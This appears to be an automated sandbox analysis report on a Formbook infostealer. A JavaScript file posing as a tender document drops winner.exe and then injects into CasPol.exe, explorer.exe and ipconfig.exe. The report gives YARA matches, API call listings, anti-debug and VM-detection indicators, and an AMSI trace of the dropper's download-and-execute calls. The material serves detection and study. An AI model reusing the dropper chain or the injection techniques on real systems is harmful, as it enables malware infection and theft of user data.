          Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 032CB150 appears 32 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E573 NtCreateFile,2_2_0041E573
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E623 NtReadFile,2_2_0041E623
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E6A3 NtClose,2_2_0041E6A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E753 NtAllocateVirtualMemory,2_2_0041E753
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01269910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_012699A0 NtCreateSection,LdrInitializeThunk,2_2_012699A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01269860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269840 NtDelayExecution,LdrInitializeThunk,2_2_01269840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_012698F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_012698F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269A20 NtResumeThread,LdrInitializeThunk,2_2_01269A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01269A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269A50 NtCreateFile,LdrInitializeThunk,2_2_01269A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269540 NtReadFile,LdrInitializeThunk,2_2_01269540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_012695D0 NtClose,LdrInitializeThunk,2_2_012695D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269710 NtQueryInformationToken,LdrInitializeThunk,2_2_01269710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_012697A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_012697A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269780 NtMapViewOfSection,LdrInitializeThunk,2_2_01269780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269FE0 NtCreateMutant,LdrInitializeThunk,2_2_01269FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01269660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01269660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_012696E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_012696E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309710 NtQueryInformationToken,LdrInitializeThunk,6_2_03309710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309780 NtMapViewOfSection,LdrInitializeThunk,6_2_03309780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309FE0 NtCreateMutant,LdrInitializeThunk,6_2_03309FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309A50 NtCreateFile,LdrInitializeThunk,6_2_03309A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033096E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_033096E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033096D0 NtCreateKey,LdrInitializeThunk,6_2_033096D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_03309910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309560 NtWriteFile,LdrInitializeThunk,6_2_03309560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309540 NtReadFile,LdrInitializeThunk,6_2_03309540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033099A0 NtCreateSection,LdrInitializeThunk,6_2_033099A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033095D0 NtClose,LdrInitializeThunk,6_2_033095D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309860 NtQuerySystemInformation,LdrInitializeThunk,6_2_03309860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309840 NtDelayExecution,LdrInitializeThunk,6_2_03309840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309730 NtQueryVirtualMemory,6_2_03309730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0330A710 NtOpenProcessToken,6_2_0330A710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309B00 NtSetValueKey,6_2_03309B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309770 NtSetInformationFile,6_2_03309770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0330A770 NtOpenThread,6_2_0330A770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309760 NtOpenProcess,6_2_03309760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0330A3B0 NtGetContextThread,6_2_0330A3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033097A0 NtUnmapViewOfSection,6_2_033097A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309A20 NtResumeThread,6_2_03309A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309610 NtEnumerateValueKey,6_2_03309610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309A10 NtQuerySection,6_2_03309A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309A00 NtProtectVirtualMemory,6_2_03309A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309670 NtQueryInformationProcess,6_2_03309670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309660 NtAllocateVirtualMemory,6_2_03309660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309650 NtQueryValueKey,6_2_03309650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309A80 NtOpenDirectoryObject,6_2_03309A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0330AD30 NtSetContextThread,6_2_0330AD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309520 NtWaitForSingleObject,6_2_03309520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309950 NtQueueApcThread,6_2_03309950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033095F0 NtQueryInformationFile,6_2_033095F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033099D0 NtCreateProcessEx,6_2_033099D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03309820 NtEnumerateKey,6_2_03309820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0330B040 NtSuspendThread,6_2_0330B040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033098A0 NtWriteVirtualMemory,6_2_033098A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033098F0 NtReadVirtualMemory,6_2_033098F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0076C830 NtReadFile,6_2_0076C830
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0076C8B0 NtClose,6_2_0076C8B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0076C880 NtDeleteFile,6_2_0076C880
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0076C780 NtCreateFile,6_2_0076C780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0076C87A NtDeleteFile,6_2_0076C87A
          Source: 0900664 MOHS Tender..jsInitial sample: Strings found which are bigger than 50
          Source: winner[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: winner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0900664 MOHS Tender..jsReversingLabs: Detection: 17%
          Source: 0900664 MOHS Tender..jsVirustotal: Detection: 27%
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0900664 MOHS Tender..js"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\winner.exe "C:\Users\user\AppData\Local\Temp\winner.exe"
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\winner.exe
          Source: classification engineClassification label: mal100.troj.spyw.evad.winJS@11/4@17/18
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\AppData\Local\Temp\winner.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: winner[1].exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csCryptographic APIs: 'CreateDecryptor'
          Source: winner.exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.0.winner.exe.260000.0.unpack, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office
          Source: Binary string: ipconfig.pdb source: CasPol.exe, 00000002.00000002.451827142.0000000001650000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: CasPol.exe, 00000002.00000002.451827142.0000000001650000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.414244816.000000000106E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.412098136.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.414244816.000000000106E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.412098136.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject%22");ITextStream.WriteLine(" entry:1742 f:_0x1f863f a0:507");ITextStream.WriteLine(" exit:1742 f:_0x1f863f r:%22ADODB.Stream%22");IHost.Name();ITextStream.WriteLine(" entry:1733 o:Windows%20Script%20Host f:CreateObject a0:%22ADODB.Stream%22");IHost.CreateObject("ADODB.Stream");IHost.Name();_Stream._00000000();ITextStream.WriteLine(" exit:1733 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:1788 f:_0x406710 a0:489 a1:%22Lnop%22");ITextStream.WriteLine(" exit:1788 f:_0x406710 r:%22Open%22");_Stream._00000000();ITextStream.WriteLine(" entry:1784 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:1784 o: f:Open r:undefined");ITextStream.WriteLine(" entry:1798 f:_0x1f863f a0:490");ITextStream.WriteLine(" exit:1798 f:_0x1f863f r:%22Type%22");_Stream.Type("1");ITextStream.WriteLine(" entry:1811 f:_0x25fd55 a0:190 a1:%22xB*!%22");ITextStream.WriteLine(" exit:1811 f:_0x25fd55 r:%22n%40H!%22");ITextStream.WriteLine(" entry:1807 f:_0x406710 a0:510 a1:%22n%40H!%22");ITextStream.WriteLine(" exit:1807 f:_0x406710 r:%22Write%22");ITextStream.WriteLine(" entry:1820 f:_0x406710 a0:491 a1:%2255%5Ef%22");ITextStream.WriteLine(" exit:1820 f:_0x406710 r:%22ResponseBody%22");IServerXMLHTTPRequest2.responseBody();_Stream._00000000();ITextStream.WriteLine(" entry:1803 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:1803 o: f:Write r:undefined");ITextStream.WriteLine(" entry:1833 f:_0xfacb16 a0:201");ITextStream.WriteLine(" exit:1833 f:_0xfacb16 r:%22%26DC)%22");ITextStream.WriteLine(" entry:1829 f:_0x406710 a0:514 a1:%22%26DC)%22");ITextStream.WriteLine(" exit:1829 f:_0x406710 r:%22Position%22");_Stream.Position("0");ITextStream.WriteLine(" entry:1842 f:_0x1f863f a0:488");ITextStream.WriteLine(" exit:1842 f:_0x1f863f 
r:%22SaveToFile%22");_Stream._00000000();ITextStream.WriteLine(" entry:1838 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5Cwinner.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\winner.exe", "2");_Stream._00000000();ITextStream.WriteLine(" exit:1838 o: f:SaveToFile r:undefined");ITextStream.WriteLine(" entry:1853 f:_0x1f863f a0:502");ITextStream.WriteLine(" exit:1853 f:_0x1f863f r:%22Close%22");_Stream._00000000();ITextStream.WriteLine(" entry:1849 o: f:Close");_Stream.Close();_Stream._00000000();ITextStream.WriteLine(" exit:1849 o: f:Close r:undefined");ITextStream.WriteLine(" entry:1864 f:_0x1f863f a0:506");ITextStream.WriteLine(" exit:1864 f:_0x1f863f r:%22Shell.Application%22");ITextStream.WriteLine(" entry:1873 f:_0x25fd55 a0:184 a1:%22o5HG%22");ITextStream.WriteLine(" exit:1873 f:_0x25fd55 r:%22%23zNv%22");ITextStream.WriteLine(" entry:1869 f:_0x406710 a0:520 a1:%22%23zNv%22");ITextStream.WriteLine(" exit:1869 f:_0x406710 r:%22ShellExecute%22");ITextStream.WriteLine(" entry:1882 f:_0x406710 a0:508 a1:%22Rtbv%22");ITextStream.WriteLine(" exit:1882 f:_0x406710 r:%22open%22")
          Source: winner[1].exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.cs.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: winner.exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.cs.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 1.0.winner.exe.260000.0.unpack, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.cs.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0900664 MOHS Tender..jsInitial file: High amount of function use 12
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004070E6 push es; retf 2_2_004070FA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004070FD push es; ret 2_2_00407121
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00411A25 push ebx; ret 2_2_00411A26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041137A push cs; retf 2_2_00411389
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00411500 push es; retf 2_2_00411501
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0040F519 push ecx; iretd 2_2_0040F51C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00401DF0 push eax; ret 2_2_00401DF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041061D push es; iretd 2_2_0041061E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0040D7F5 push ss; ret 2_2_0040D7F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00408FF6 push 0000002Dh; retf 2_2_00408FF8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0331D0D1 push ecx; ret 6_2_0331D0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0075E82A push es; iretd 6_2_0075E82B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_00757203 push 0000002Dh; retf 6_2_00757205
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0075BA02 push ss; ret 6_2_0075BA03
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_007552F3 push es; retf 6_2_00755307
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0075530A push es; ret 6_2_0075532E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0075EBB1 push ds; iretd 6_2_0075EBBB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0075D726 push ecx; iretd 6_2_0075D729
          Source: winner[1].exe.0.drStatic PE information: 0xD8667C29 [Wed Jan 17 18:38:33 2085 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.955706486802807
          Source: winner[1].exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csHigh entropy of concatenated method names: '.cctor', 'l0dWZlv1b4IeI', 'S0c4ZhKCI', 'QdkbCQ9IO', 'HDnH3HI5u', 'Rsodxyse1', 'yldO0reJD', 't7VsNmSbu', 'GKECCuoHa', 'f9xlJUep9'
          Source: winner.exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csHigh entropy of concatenated method names: '.cctor', 'l0dWZlv1b4IeI', 'S0c4ZhKCI', 'QdkbCQ9IO', 'HDnH3HI5u', 'Rsodxyse1', 'yldO0reJD', 't7VsNmSbu', 'GKECCuoHa', 'f9xlJUep9'
          Source: 1.0.winner.exe.260000.0.unpack, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csHigh entropy of concatenated method names: '.cctor', 'l0dWZlv1b4IeI', 'S0c4ZhKCI', 'QdkbCQ9IO', 'HDnH3HI5u', 'Rsodxyse1', 'yldO0reJD', 't7VsNmSbu', 'GKECCuoHa', 'f9xlJUep9'

          Persistence and Installation Behavior

          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\winner.exe
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\winner[1].exe

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\0900664 mohs tender..js
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\winner.exe TID: 5220Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4988Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 352Thread sleep count: 42 > 30
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 352Thread sleep time: -84000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03395BA5 rdtsc 6_2_03395BA5
          Source: C:\Users\user\AppData\Local\Temp\winner.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 875
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_007631E0 FindFirstFileW,FindNextFileW,FindClose,6_2_007631E0
          Source: explorer.exe, 00000003.00000000.427299636.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.427299636.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000003.00000000.427299636.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.420383797.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.673513003.000000000EE2B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813008364.000000000EE2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.605240381.000000000EE2B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535002344.00000000065FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.532828824.000000000EE2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.585074615.000000000EE2B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.612040526.000000000EE2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.427299636.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.427299636.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03395BA5 rdtsc 6_2_03395BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 2_2_0040CF63 LdrLoadDll,2_2_0040CF63
          Source: C:\Users\user\AppData\Local\Temp\winner.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\System32\wscript.exe File created: winner[1].exe.0.dr
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 1290000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread register set: target process: 3324
          Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 3324
          Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\winner.exe "C:\Users\user\AppData\Local\Temp\winner.exe"
          Source: C:\Users\user\AppData\Local\Temp\winner.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: explorer.exe, 00000003.00000003.674746526.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.418133274.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.423037496.0000000005910000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.418133274.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.828052999.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000003.00000000.418133274.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.828052999.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.418133274.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.828052999.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.827550131.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
          Source: C:\Users\user\AppData\Local\Temp\winner.exe Queries volume information: C:\Users\user\AppData\Local\Temp\winner.exe VolumeInformation
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match | File source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
